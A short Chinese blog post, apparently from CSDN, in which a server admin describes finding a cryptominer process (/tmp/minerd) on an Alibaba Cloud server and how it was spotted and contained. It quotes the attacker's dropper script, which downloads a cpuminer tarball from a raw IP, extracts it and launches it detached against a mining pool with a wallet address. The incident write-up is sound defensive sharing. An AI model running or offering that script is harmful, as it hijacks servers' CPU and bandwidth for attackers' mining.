服务器被挖矿minerd

用的阿里云服务器,这两天报警,load值高,

看了下管理控制台,近期流量也耗了不少钱

top 看了下 有个进程耗cpu居高不下,

进程:/tmp/minerd

百度了下,原来是个挖矿程序

如果top看不到的话,ps查看每一个进程名,也可以发现端倪

不知道是暴力破解密码还是通过其他漏洞植入的

在/tmp目录下放了一个sh文件

文件内容:

wget http://211.79.60.17/project/cpuminer/pooler-cpuminer-2.4.2-linux-x86_64.tar.gz
tar -xzf pooler-cpuminer-2.4.2-linux-x86_64.tar.gz
setsid /tmp/minerd -a scrypt  -o 31.41.40.25:9327 -u LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk:1 &

杀掉进程后查看了下定时任务 crontab -l   ,定时任务没有做手脚

目前先修改了登陆密码,后续再观察

阅读更多
个人分类: 服务器
想对作者说点什么? 我来说一句

没有更多推荐了,返回首页

加入CSDN,享受更精准的内容推荐,与500万程序员共同成长!
关闭
关闭